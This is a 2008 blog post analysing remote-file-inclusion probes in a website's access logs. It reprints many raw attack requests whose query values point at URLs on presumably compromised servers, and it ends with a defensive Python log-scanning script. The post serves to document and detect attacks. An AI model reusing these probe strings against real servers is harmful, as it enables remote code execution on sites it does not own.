Yet Another Website Code-Injection Hacking Attempt
Posted by Hans de Ruiter
This will probably be one of the last blog entries about code-injection attempts on this website. A pattern has emerged, and until some new form of attack appears there is little point in documenting every slight variation. Yesterday three nearly identical attempts arrived from three different addresses, and this time they made some effort to blend in with ordinary browsing. As usual, the tell-tale sign is a full URL to somebody else's website stuffed into a query parameter:
85.119.217.230 - - [06/Aug/2008:23:52:32 -0400] "GET /assets/galleries/minigl-2-0-gallery/gears.jpg?PHPSESSID=http%3A%2F%2Fchyngachanga.ru%2Fcontent%2Fwuge%2Fowofi%2F HTTP/1.0" 200 26117 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:33 -0400] "GET /assets/galleries/minigl-2-0-gallery/gears.jpg?PHPSESSID=http%3A%2F%2Fwww.vlopezalvarez.com%2FPersonal%2FFotos%2FViajes%2Fxaj%2Fupahebu%2F HTTP/1.0" 200 26117 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:34 -0400] "GET /assets/galleries/minigl-2-0-gallery/gears.jpg?PHPSESSID=http%3A%2F%2Fwww.clubnataciotortosa.com%2FUserFiles%2FMedia%2Fulagoh%2Flivacoz%2F HTTP/1.0" 200 26117 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
The attack is not really aimed at PHP's session handling. Scanners of this kind take whatever parameter they find in a site's links (here PHPSESSID, and further down pageid) and replace its value with the URL of a directory on another, presumably compromised, server, hoping that some script on the target passes that parameter to include() or require() and so fetches and executes remote code (remote file inclusion). The session ID itself is not the weak point: a value containing ':' and '/' is not a valid session identifier (PHP's default files session handler accepts only letters, digits, comma and dash), so it is never used as a session, which is why a fresh, normal-looking 32-character hex PHPSESSID shows up in the very next request. What is also interesting is that this latest string of attempts claims to be Internet Explorer 7.0 (IE7). To make sure that IE7 itself does not generate such requests, I visited this site using IE7, and it functioned perfectly normally; the User-Agent header is supplied by the client, so a bot can present any browser string it likes. The three requests with bogus PHPSESSIDs sit inside a run of requests with perfectly normal ones. The only sign that no human is behind them is the timing: every page is requested within a second or two of the previous one. For reference, the full set of accesses for one of these attacks is:
85.119.217.230 - - [06/Aug/2008:23:52:32 -0400] "GET / HTTP/1.0" 200 21686 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:32 -0400] "GET /assets/galleries/minigl-2-0-gallery/gears.jpg?PHPSESSID=http%3A%2F%2Fchyngachanga.ru%2Fcontent%2Fwuge%2Fowofi%2F HTTP/1.0" 200 26117 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:33 -0400] "GET /assets/galleries/minigl-2-0-gallery/gears.jpg?PHPSESSID=http%3A%2F%2Fwww.vlopezalvarez.com%2FPersonal%2FFotos%2FViajes%2Fxaj%2Fupahebu%2F HTTP/1.0" 200 26117 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:34 -0400] "GET /assets/galleries/minigl-2-0-gallery/gears.jpg?PHPSESSID=http%3A%2F%2Fwww.clubnataciotortosa.com%2FUserFiles%2FMedia%2Fulagoh%2Flivacoz%2F HTTP/1.0" 200 26117 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:35 -0400] "GET /assets/galleries/minigl-2-0-gallery/gears.jpg?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 26117 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:41 -0400] "GET /amiga-os-4-projects/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 11037 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:43 -0400] "GET /about-me/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 12579 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:44 -0400] "GET /index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 404 8481 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:48 -0400] "GET /website-hacking-attempts/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 19069 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:51 -0400] "GET /PageComment/rss?pageid=http%3A%2F%2Fwww.interkonet.com%2Fgaleria%2Fmodules%2Falbumselect%2Fucu%2Fiwuy%2F HTTP/1.0" 200 157 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:51 -0400] "GET /PageComment/rss?pageid=http%3A%2F%2Fwww.antwerpsupporter.be%2Fmvdm_polls%2Fincludeold%2Folom%2Fyeq%2F HTTP/1.0" 200 157 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:52 -0400] "GET /PageComment/rss?pageid=http%3A%2F%2Fwww.boomerbible.com%2Finstapunk%2FMType%2Farchives%2Fajuq%2Fevuji%2F HTTP/1.0" 200 157 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:54 -0400] "GET /fishing-for-administrator-pages-a-break-in-attempt/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 20370 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:52:55 -0400] "GET /projects/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 9273 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:02 -0400] "GET /free-ideas/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 15448 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:03 -0400] "GET /want-to-help/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 14733 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:04 -0400] "GET /amiga-os-4-projects/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 11037 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:06 -0400] "GET /about-me/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 12579 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:07 -0400] "GET /PageComment/rss?pageid=92 HTTP/1.0" 200 157 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:09 -0400] "GET /website-hacking-attempts/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 19069 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:11 -0400] "GET /blog/tag/monthly+review?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 18706 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:15 -0400] "GET /blog/tag/website+promotion?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 32918 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:17 -0400] "GET /projects/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 9273 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:18 -0400] "GET /projects/amiga-os-4-projects/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 9273 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:19 -0400] "GET /free-ideas/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 15448 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:23 -0400] "GET /want-to-help/want-to-help/?PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 15013 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:25 -0400] "GET /month-in-review/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 21152 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:27 -0400] "GET /a-visit-from-technorati/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 19418 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:28 -0400] "GET /projects/amiga-os-4-projects/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 9273 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:29 -0400] "GET /want-to-help/want-to-help/want-to-help/want-to-help/?PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 15358 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:31 -0400] "GET /month-in-review/the-first-content/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 21152 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:33 -0400] "GET /a-visit-from-technorati/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 19418 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:38 -0400] "GET /want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/?PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 15833 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:39 -0400] "GET /month-in-review/the-first-content/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 21152 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:40 -0400] "GET /want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/?PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 16568 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:43 -0400] "GET /want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 15758 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:45 -0400] "GET /want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 17013 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:46 -0400] "GET /want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 16798 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:47 -0400] "GET /want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 19093 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
85.119.217.230 - - [06/Aug/2008:23:53:48 -0400] "GET /want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/index.html?PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 403 1872 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
The last few accesses are also unusual: the path repeats the want-to-help/ directory over and over, and the PHPSESSID parameter is duplicated. Look at the depth: two, four, eight, sixteen, thirty-two, sixty-four copies of the same segment, doubling with each visit. That is consistent with a crawler that takes a link echoing the current path as a relative reference and resolves it against the directory it is already in, so each fetch doubles the depth; the growing string of PHPSESSID parameters is the same mechanism applied to the ?PHPSESSID= that PHP's session.use_trans_sid appends to every link. This could simply be a bug in the crawler; I cannot replicate it using IE7. Another possibility is that the limits of the web server's URL length are being assessed, along with the server's response; this page mentions the possibility of using an oversized URL to induce a buffer overflow. Note, though, that the final request was answered with 403 Forbidden, which is not what a web server returns when a request line exceeds its length limit (Apache, for instance, answers 414 Request-URI Too Long), so that last block looks like a filtering rule at the host rather than a size limit being hit. Either way, the web-server software run by the hosting provider for this website showed no sign of such a vulnerability.
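To make the pattern above concrete, here is an added example (my own code, not from the original post or from the site's software) that runs these checks over a handful of constructed log lines modelled on the excerpt: it flags any query parameter whose value is an absolute URL (the remote-file-inclusion probe), PHPSESSID values that cannot be session IDs, paths that repeat one directory segment and duplicated parameters (the crawler loop at the end), and rates each client by how quickly its requests follow one another. The thresholds (two seconds between requests, three-quarters of gaps, repeat depth four) and the second client address are assumptions chosen for the demonstration, not anything the post specifies.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" log format, as in the excerpt above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Character set PHP's files session handler accepts in a session ID.
SESSID_RE = re.compile(r'^[A-Za-z0-9,-]{1,128}$')
ABS_URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)

# Constructed sample, modelled on the log above; the 192.0.2.10 visitor is
# an assumed ordinary reader (TEST-NET address) for contrast.
SAMPLE_LOG = """\
85.119.217.230 - - [06/Aug/2008:23:52:32 -0400] "GET / HTTP/1.0" 200 21686 "-" "Mozilla/4.0 (compatible; MSIE 7.0)"
85.119.217.230 - - [06/Aug/2008:23:52:32 -0400] "GET /assets/galleries/minigl-2-0-gallery/gears.jpg?PHPSESSID=http%3A%2F%2Fchyngachanga.ru%2Fcontent%2Fwuge%2Fowofi%2F HTTP/1.0" 200 26117 "-" "Mozilla/4.0 (compatible; MSIE 7.0)"
85.119.217.230 - - [06/Aug/2008:23:52:33 -0400] "GET /assets/galleries/minigl-2-0-gallery/gears.jpg?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 26117 "-" "Mozilla/4.0 (compatible; MSIE 7.0)"
85.119.217.230 - - [06/Aug/2008:23:52:35 -0400] "GET /PageComment/rss?pageid=http%3A%2F%2Fwww.interkonet.com%2Fgaleria%2Fmodules%2Falbumselect%2Fucu%2Fiwuy%2F HTTP/1.0" 200 157 "-" "Mozilla/4.0 (compatible; MSIE 7.0)"
85.119.217.230 - - [06/Aug/2008:23:52:36 -0400] "GET /want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/want-to-help/?PHPSESSID=9b54b77a38c25f7de91c51033628790f&PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 15833 "-" "Mozilla/4.0 (compatible; MSIE 7.0)"
192.0.2.10 - - [06/Aug/2008:23:55:00 -0400] "GET /about-me/?PHPSESSID=9b54b77a38c25f7de91c51033628790f HTTP/1.0" 200 12579 "-" "Mozilla/5.0"
192.0.2.10 - - [06/Aug/2008:23:56:30 -0400] "GET /projects/ HTTP/1.0" 200 9273 "http://hdrlab.org.nz/about-me/" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['time'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    split = urlsplit(rec['target'])
    rec['path'] = split.path
    rec['params'] = parse_qsl(split.query, keep_blank_values=True)  # %-decoded
    return rec


def find_rfi_probes(rec):
    """Parameters whose value is an absolute URL: the remote-file-inclusion probe."""
    return [(k, v) for k, v in rec['params'] if ABS_URL_RE.match(v)]


def bad_session_ids(rec):
    """PHPSESSID values PHP would refuse to use as a session identifier."""
    return [v for k, v in rec['params'] if k == 'PHPSESSID' and not SESSID_RE.match(v)]


def path_repeat_depth(path):
    """Longest run of one directory segment repeated consecutively."""
    segs = [s for s in path.split('/') if s]
    best = run = 0
    for i, s in enumerate(segs):
        run = run + 1 if i and s == segs[i - 1] else 1
        best = max(best, run)
    return best


def duplicate_params(rec):
    """Parameter names that occur more than once in the query string."""
    counts = defaultdict(int)
    for k, _ in rec['params']:
        counts[k] += 1
    return {k: n for k, n in counts.items() if n > 1}


def request_gaps(recs):
    """Seconds between consecutive requests from one client, in time order."""
    times = sorted(r['time'] for r in recs)
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


def looks_automated(gaps, max_gap=2.0, fraction=0.75):
    """True when at least `fraction` of the gaps are <= max_gap seconds (assumed thresholds)."""
    if not gaps:
        return False
    return sum(1 for g in gaps if g <= max_gap) / len(gaps) >= fraction


def analyse(lines, loop_depth=4):
    """Return (findings, clients): findings are (ip, kind, detail) tuples,
    clients maps ip -> (request count, looks automated)."""
    findings, by_ip = [], defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        by_ip[rec['ip']].append(rec)
        probes = find_rfi_probes(rec)
        for k, v in probes:
            findings.append((rec['ip'], 'rfi-probe', f'{k}={v}'))
        probed = {v for _, v in probes}
        for v in bad_session_ids(rec):
            if v not in probed:  # already reported as an RFI probe
                findings.append((rec['ip'], 'bad-sessid', v))
        depth = path_repeat_depth(rec['path'])
        if depth >= loop_depth:
            findings.append((rec['ip'], 'path-loop', f'depth={depth}'))
        dups = duplicate_params(rec)
        if dups:
            findings.append((rec['ip'], 'dup-param',
                             ','.join(f'{k}x{n}' for k, n in sorted(dups.items()))))
    clients = {ip: (len(rs), looks_automated(request_gaps(rs))) for ip, rs in by_ip.items()}
    return findings, clients


if __name__ == '__main__':
    found, who = analyse(SAMPLE_LOG.splitlines())
    for ip, kind, detail in found:
        print(f'{ip:16} {kind:10} {detail}')
    for ip, (n, bot) in who.items():
        print(f'{ip:16} {n} requests, automated={bot}')
```

The decoded parameter values are what matter: the raw log shows %3A%2F%2F, and a rule that only looks for "http://" in the undecoded request line would miss the probe. Sending the flagged addresses to a firewall or fail2ban rule is the usual next step; the path-loop and dup-param findings are worth keeping separate, because on their own they indicate a broken crawler rather than hostility.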
Comments
Posted by Hans, 03/10/2008 11:24am
The admin of this site can be contacted via the email addresses listed on the contact page (http://hdrlab.org.nz/contact-me/).

Posted by datbiacterb, 02/10/2008 7:16pm
How may I contact the admin of this site? I have a question.

Posted by John Williams, 20/08/2008 3:56pm
Pretty nice site, I want to see much more on it! :)